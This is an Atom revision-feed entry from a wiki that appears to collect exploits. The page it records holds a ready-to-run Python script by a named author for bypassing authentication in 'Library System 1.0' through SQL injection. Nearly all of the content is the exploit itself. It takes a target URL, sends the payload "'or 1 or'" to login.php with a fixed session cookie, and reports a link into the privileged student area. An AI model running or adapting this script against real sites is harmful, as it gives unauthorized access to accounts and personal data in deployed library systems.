https://pwnwiki.com/index.php?action=history&feed=atom&title=Library_System_1.0_SQL%E6%B3%A8%E5%85%A5%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E 2026-04-20T23:45:29Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=Library_System_1.0_SQL%E6%B3%A8%E5%85%A5%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&diff=1269&oldid=prev 2021-04-08T09:41:13Z

<p>Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Library System 1.0 - Authentication Bypass Via SQL Injection # Exploit Author: Himanshu Shukla # Date: 2021-01-21 # Vendor Homepage: https://www...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: Library System 1.0 - Authentication Bypass Via SQL Injection<br /> # Exploit Author: Himanshu Shukla<br /> # Date: 2021-01-21<br /> # Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html<br /> # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/libsystem.zip<br /> # Version: 1.0<br /> # Tested On: Windows 10 + XAMPP 7.4.4<br /> # Description: Library System 1.0 - Authentication Bypass Via SQL Injection<br /> #STEP 1 : Run The Exploit With This Command : python3 exploit.py<br /> #STEP 2 : Input the URL of Vulnable Application. For Example: http://10.9.67.23/libsystem/<br /> #STEP 3 : Open the Link Provided At The End After Successful authentication bypass in Browser. <br /> <br /> #Note - You Will Only Be Able To Access The Student Area as a Privileged User.<br /> <br /> import requests<br /> YELLOW = '\033[33m' # Yellow Text<br /> GREEN = '\033[32m' # Green Text<br /> RED = '\033[31m' # Red Text<br /> RESET = '\033[m' # reset to the defaults<br /> <br /> print(YELLOW+' _ ______ _ _ ___ ', RESET)<br /> print(YELLOW+' ___| |_ ___ / / ___|| |__ __ _ __| |/ _ \__ __', RESET)<br /> print(YELLOW+&quot; / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /&quot;, RESET)<br /> print(YELLOW+'| __/ || (__ / / ___) | | | | (_| | (_| | |_| |\ V V / ', RESET)<br /> print(YELLOW+' \___|\__\___/_/ |____/|_| |_|\__,_|\__,_|\___/ \_/\_/ ', RESET)<br /> print(YELLOW+&quot; &quot;, RESET) <br /> print('********************************************************')<br /> print('** LIBRARY SYSTEM 1.0 **')<br /> print('** AUTHENTICATION BYPASS USING SQL INJECTION **')<br /> print('********************************************************')<br /> <br /> print('Author - Himanshu Shukla')<br /> <br /> <br /> #Create a new session<br /> <br /> s = requests.Session() <br /> <br /> #Set Cookie<br /> cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'}<br /> <br /> LINK=input(&quot;Enter URL of The Vulnarable Application : &quot;)<br /> <br /> #Authentication Bypass<br /> print(&quot;[*]Attempting Authentication Bypass...&quot;)<br /> values = {&quot;student&quot;:&quot;'or 1 or'&quot;,&quot;login&quot;:&quot;&quot;}<br /> r=s.post(LINK+'login.php', data=values, cookies=cookies) <br /> <br /> r=s.post(LINK+'login.php', data=values, cookies=cookies) <br /> <br /> #Check if Authentication was bypassed or not.<br /> logged_in = True if not(&quot;Student not found&quot; in r.text) else False<br /> l=logged_in<br /> if l:<br /> print(GREEN+&quot;[+]Authentication Bypass Successful!&quot;, RESET)<br /> print(YELLOW+&quot;[+]Open This Link To Continue As Privileged User : &quot;+LINK+&quot;index.php&quot;, RESET)<br /> else:<br /> print(RED+&quot;[-]Failed To Authenticate!&quot;, RESET)<br /> <br /> &lt;/pre&gt;</div>

Pwnwiki